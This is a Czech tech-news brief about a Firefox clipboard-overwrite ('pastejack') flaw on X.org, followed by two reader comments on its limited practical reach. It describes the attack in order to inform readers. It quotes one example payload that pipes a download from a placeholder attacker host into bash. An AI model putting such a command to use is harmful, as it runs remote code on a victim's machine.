Hlavní navigace

Pastejack: útok přepisováním schránky ve Firefoxu

17. 10. 2023

Sdílet

Firefox prohlížeč Mozilla Autor: Mozilla

Bylo objeveno, že ve Firefoxu běžícím na X.org (a možná i dalších grafických rozhraních) může JavaScript ve stránce, i když je stránka v nevybraném panelu a prohlížeč je na pozadí, zapisovat do schránky libovolné hodnoty.

Potenciální zneužití může vypadat tak, že stránka po náhodné době vloží do schránky příkaz typu:

curl https://útočník/ | bash \r\n

Pak doufá, že uživatel zrovna kopíruje nějaké věci do terminálu (případně editoru jako Vim s příkazovým režimem atd.) a toto tam vloží místo toho, co opravdu vložit chce. Protože stránka může s vložením do schránky počkat, nefungují běžné obrany se „sanitizací“ obsahu schránky po přepnutí z webového prohlížeče do jiné aplikace.

Interně trik funguje tak, že JavaScript vyvolá vybrání nějakého prvku. V X.org a podobných rozhraních je běžné, že se výběr automaticky zkopíruje do schránky. Můžete se podívat na demonstraci principu.

Tato zprávička byla zaslána čtenářem serveru Root.cz pomocí formuláře Přidat zprávičku. Děkujeme!

Našli jste v článku chybu?
  • Aktualita je stará, nové názory již nelze přidávat.
  • 18. 10. 2023 9:10

    martinpoljak

    On je dosah dost omezený. Protože sice teoreticky "V X.org a podobných rozhraních je běžné, že se výběr automaticky zkopíruje do schránky" ale prakticky to tak v moderních (nejen) linuxových rozhraních prakticky nikde nefunguje.

  • 18. 10. 2023 12:57

    PavelM

    Ubuntu a Firefox 118.0.1 ve snapu nějak funguje - ale text se nevkládá do schránky, musel by se vložit pomocí prostředního tlačítka myši.

Byl pro vás článek přínosný?